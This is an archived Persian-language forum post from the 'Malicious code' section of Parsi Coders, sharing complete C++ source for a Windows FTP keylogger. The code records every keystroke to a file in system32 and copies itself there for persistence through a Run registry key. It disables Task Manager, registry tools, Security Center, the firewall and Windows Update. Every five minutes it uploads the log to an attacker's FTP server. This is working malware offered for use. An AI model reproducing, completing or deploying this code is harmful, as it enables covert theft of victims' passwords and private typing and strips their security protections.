Parsi Coders

Parsi Coders > Security and influence > Influence > Malicious code > سورس کد اف تی پی کیلاگر
نسخه‌ی کامل: سورس کد اف تی پی کیلاگر
شما در حال مشاهده نسخه آرشیو هستید. برای مشاهده نسخه کامل کلیک کنید.

Amin_Mansouri

09-17-2012، 07:12 PM
سورس کد زیر یک سورس کیلاگر به زبان سی پلاس پلاس هست که دارای قابلیت ذخیره لاگ های سیستم قربانی بر روی ftp رو دارد.
FTP Keylogger
کد:
#include <windows.h>

#include <Winuser.h>

#include <string>

#include <fstream>

using namespace std;



char BatchFile[20] = "system.bat";

char* params;



DWORD WINAPI OpenBatFile(LPVOID)

{

      for(;;) {

Sleep(300000);

ShellExecute(NULL, "open", BatchFile, NULL, NULL, SW_HIDE);}

}





std::string GetKey(int Key)

{

    std::string KeyString = "";



    if (Key == 8)

        KeyString = "[delete]";

    else if (Key == 13)

        KeyString = "n";

    else if (Key == 32)

        KeyString = " ";

    else if (Key == VK_PAUSE)

        KeyString = "[PAUSE]";

    else if (Key == VK_CAPITAL)

        KeyString = "[CAPITAL]";

    else if (Key == VK_SHIFT)

        KeyString = "[SHIFT]";

    else if (Key == VK_TAB)

        KeyString = "[TABULATOR]";

    else if (Key == VK_CONTROL)

        KeyString = "[CTRL]";

    else if (Key == VK_ESCAPE)

        KeyString = "[ESCAPE]";

    else if (Key == VK_END)

        KeyString = "[END]";

    else if (Key == VK_HOME)

        KeyString = "[HOME]";

    else if (Key == VK_LEFT)

        KeyString = "[LEFT]";

    else if (Key == VK_RIGHT)

        KeyString = "[RIGHT]";

    else if (Key == VK_UP)

        KeyString = "[UP]";

    else if (Key == VK_DOWN)

        KeyString = "[DOWN]";

    else if (Key == VK_SNAPSHOT)

        KeyString = "[SNAPSHOT]";

    else if (Key == VK_NUMLOCK)

        KeyString = "[NUMLOCK]";

    else if (Key == 190 || Key == 110)

        KeyString = ".";

  

    else if (Key >=96 && Key <= 105)

        KeyString = Key-48;

    else if (Key > 47 && Key < 60)

        KeyString = Key;

    if (Key != VK_LBUTTON || Key != VK_RBUTTON)

    {

        if (Key > 64 && Key < 91)

        {

            if (GetKeyState(VK_CAPITAL))

                KeyString = Key;

            else

            {

                Key = Key + 32;

                KeyString = Key;

            }

        }

    }



    return KeyString;

}



int main()

{

    int WINAPI WinMain (HINSTANCE hThisInstance,

    HINSTANCE hPrevInstance,

    LPSTR lpszArgument,

    int nFunsterStil);

    

  char path[MAX_PATH];

  HMODULE GetModH = GetModuleHandle(NULL);

    

  char sys[MAX_PATH];

  GetModuleFileName(GetModH, path, sizeof(path));

  GetSystemDirectory(sys, sizeof(sys));

  strcat(sys, "\borg.exe");

  CopyFile(path, sys, false);

    

  HKEY hKey, hKey2;

  

  unsigned char reg[2] = "0";

  

  RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\Microsoft\Windows\CurrentVersion\Run", 0, KEY_SET_VALUE, &hKey );

  RegSetValueEx(hKey, "MS-Windows-secretly", 0, REG_SZ,(const unsigned char*)sys, sizeof(sys));

  RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",&hKey2);

  RegSetValueEx(hKey2,"DisableTaskMgr",0,REG_DWORD,reg,sizeof(reg));

  RegCloseKey(hKey),(hKey2);



  DeleteFile("C:\WINDOWS\system32\log.txt");  

    

  ofstream FWUP;

  FWUP.open("C:\WINDOWS\system32\update.bat");

  FWUP<<"@echo offn";

  FWUP<<"net stop ""Security Center""n";

  FWUP<<"net stop SharedAccessn";

  FWUP<<"> ""%Temp%.\kill.reg"" ECHO REGEDIT4n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO.n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO ""Start""=dword:00000004n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO.n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO ""Start""=dword:00000004n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO.n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO ""Start""=dword:00000004n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO.n";

  FWUP<<"START /WAIT REGEDIT /S ""%Temp%.\kill.reg""n";

  FWUP<<"DEL ""%Temp%.\kill.reg""n";

  FWUP<<"DEL %0n";

  FWUP.close();  

    

  ofstream disable;

  disable.open("C:\WINDOWS\system32\syssvr.bat");

  disable<<"@echo offn";

  disable<<"reg add ""HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"" /v ""disableregistrytools"" /t REG_DWORD /d ""1"" /f >NULn";

  disable.close();  

  

  //write ur ftp-information's here

  ofstream log;

  log.open("C:\WINDOWS\system32\drivers\config.sys");

  log<<"OPEN ftpservern";

  log<<"USER usernamen";

  log<<"ftppasswordn";

  log<<"ASCIIn";

  log<<"SEND C:\WINDOWS\system32\log.txtn";

  log<<"BYEn";

  log<<"exitn";

  log.close();

  

  ofstream Ausgabe;

  Ausgabe.open("C:\WINDOWS\system32\system.bat");

  Ausgabe<<"ftp -n -i -s:C:\WINDOWS\system32\drivers\config.sysn";

  Ausgabe<<"byen";

  Ausgabe<<"exitn";

  Ausgabe.close();

  

  ShellExecute(NULL, NULL, "C:\WINDOWS\system32\syssvr.bat", params, NULL, SW_HIDE);

  ShellExecute(NULL, NULL, "C:\WINDOWS\system32\update.bat", params, NULL, SW_HIDE);

  

  DWORD OpenBatch;

  

  HANDLE hOpenBatFile = CreateThread(NULL, 0, OpenBatFile, 0, 0, &OpenBatch);

    

    std::string Filename = "C:\WINDOWS\system32\log.txt";

    std::string TempString = "";

    std::fstream FStream;

    FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);



    while(true)

    {

        // 0% CPU

        Sleep(5);



        for(int i = 8; i < 191; i++)

        {

           if(GetAsyncKeyState(i)&1 ==1)

           {

                TempString = GetKey (i);



                FStream.write(TempString.c_str(), TempString.size());

                FStream.close();

                FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);

           }

        }

    }

}
Parsi Coders > Security and influence > Influence > Malicious code > سورس کد اف تی پی کیلاگر